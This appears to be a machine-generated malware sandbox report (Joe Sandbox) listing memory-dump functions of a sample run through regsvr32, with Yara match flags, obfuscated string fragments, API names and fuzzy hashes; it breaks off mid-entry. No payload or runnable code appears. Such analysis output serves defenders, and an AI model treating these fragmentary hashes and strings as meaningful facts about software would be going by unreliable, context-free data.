                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                    • Instruction ID: b0873fb35405d9ee90271018676898050d4d43bdbdca2ae9cef836e3680ef931
                                                                    • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                    • Instruction Fuzzy Hash: B7016125E2AA0189EB508F21FC9026D63B0FB49F90F447630EE5E877B0DE3CD9958344
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$_getptd
                                                                    • String ID:
                                                                    • API String ID: 1743167714-0
                                                                    • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                    • Instruction ID: e583748a0c543795a71909a3c43749ae03a05d87640418671699eaca0d579f45
                                                                    • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                    • Instruction Fuzzy Hash: DD613A72F0898A96DB78DA60DD556ED73A1FB88306F402136DA1DC7AA0CF3CE6658704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >97"$?$LsRW$~x
                                                                    • API String ID: 0-2554301858
                                                                    • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                    • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                    • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                    • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$__tzset
                                                                    • String ID:
                                                                    • API String ID: 3587134695-0
                                                                    • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                    • Instruction ID: c0e707daf3fcad7cd5100c4ef86336e01c64458e9539cb793898d8a01283e237
                                                                    • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                    • Instruction Fuzzy Hash: 57027332E09646C6E7788F2999B013D37F1FB44741FA4603ADF4E86EA1CE78D6448705
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointer_lock
                                                                    • String ID:
                                                                    • API String ID: 2175075375-0
                                                                    • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                    • Instruction ID: 0320b909110b66eb599eb7ecff3c091cf1edac56ee1ea1c36ceb6f805b0d97a3
                                                                    • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                    • Instruction Fuzzy Hash: 9931AE21F0C75342FB759A659D7937E61E1BF54384F046438EE4DC6EA6EE2CEA408308
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlCaptureContext.KERNEL32 ref: 00007FFF21BBD357
                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BBD39D
                                                                    • UnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BBD3A8
                                                                      • Part of subcall function 00007FFF21BB6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFF21BB7194,?,?,?,?,00007FFF21BB6C69,?,?,00000000,00007FFF21BB30C0), ref: 00007FFF21BB6FCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                    • String ID:
                                                                    • API String ID: 2731829486-0
                                                                    • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                    • Instruction ID: 00701e499a1f84a9d84c2628647928b903278210beab326bf5d73b5f851e14f9
                                                                    • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                    • Instruction Fuzzy Hash: B1116025E29A4646E7349B20EC507AE63F1FF85304F442136E98D82FB5DF2DE504CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *4$5F$S^r
                                                                    • API String ID: 0-3556444313
                                                                    • Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                    • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                    • Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                    • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: &lz2$'~W$<x<
                                                                    • API String ID: 0-2268522332
                                                                    • Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                    • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                    • Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                    • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$T]0$ba^2
                                                                    • API String ID: 0-1276948933
                                                                    • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                    • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                    • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                    • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6w5*$EDO$V
                                                                    • API String ID: 0-1640223502
                                                                    • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                    • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                    • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                    • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Y()$i_"o$|Y
                                                                    • API String ID: 0-942011364
                                                                    • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                    • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
